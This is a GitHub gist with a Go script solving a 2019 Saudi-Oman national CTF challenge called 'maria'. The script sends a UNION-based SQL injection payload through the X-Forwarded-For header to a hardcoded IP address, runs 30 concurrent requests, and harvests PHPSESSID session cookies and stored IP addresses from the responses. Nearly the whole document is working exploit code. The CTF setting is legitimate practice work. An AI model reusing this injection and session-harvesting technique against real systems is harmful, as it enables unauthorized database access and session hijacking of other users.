Skip to content

Instantly share code, notes, and snippets.

@chtzvt
Last active February 18, 2019 03:33
Show Gist options
  • Save chtzvt/a632abeba3648a43de85ed47322cd6b8 to your computer and use it in GitHub Desktop.
Save chtzvt/a632abeba3648a43de85ed47322cd6b8 to your computer and use it in GitHub Desktop.
// https://cybertalents.com/competitions/quals-saudi-oman-national-cyber-security-ctf-2019/maria/
// 🂁 ctrezevant@sdf ~ $ time go run ctf.go
// go run ctf.go 1.17s user 0.45s system 48% cpu 3.341 total
package main
import (
"fmt"
"math/rand"
"net/http"
"regexp"
"sync"
"time"
)
func main() {
url := "http://35.222.174.178/maria/"
payload := "kfdad' or id = '6969' union select 'test',1,2,(select ip_address from nxf8_sessions WHERE id=%d) from nxf8_sessions--"
wg := &sync.WaitGroup{}
for i := 0; i < 30; i++ {
go (func(wg *sync.WaitGroup, url, payload *string, offset int) {
wg.Add(1)
time.Sleep(time.Duration(rand.Intn(3) + 3) * time.Microsecond)
sendPayload(url, payload, offset)
wg.Done()
})(wg, &url, &payload, i)
}
wg.Wait()
}
func sendPayload(url, query *string, offset int) {
client := &http.Client{}
req, err := http.NewRequest("GET", *url, nil)
if err != nil {
fmt.Print("sendPayload: " + err.Error())
return
}
req.Header.Add("X-Forwarded-For", fmt.Sprintf(*query, offset))
res, err := client.Do(req)
if err != nil {
fmt.Print("sendPayload: " + err.Error())
return
}
if res == nil || res.StatusCode != 200 {
fmt.Printf("sendPayload: response is nil or != 200 for offset %d", offset)
return
}
isIP := regexp.MustCompile(`^[^a-zA-Z]+$`).MatchString
var ipAddr string
var sessionID string
for _, cookie := range res.Cookies() {
if isIP(cookie.Value) && cookie.Name == "PHPSESSID" {
ipAddr = cookie.Value
}
if !isIP(cookie.Value) && cookie.Value != "deleted" && cookie.Name == "PHPSESSID" {
sessionID = cookie.Value
}
}
if ipAddr != "" && sessionID != "" {
fmt.Printf("[ID: %d IP: %s SESSID: %s]\n", offset, ipAddr, sessionID)
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment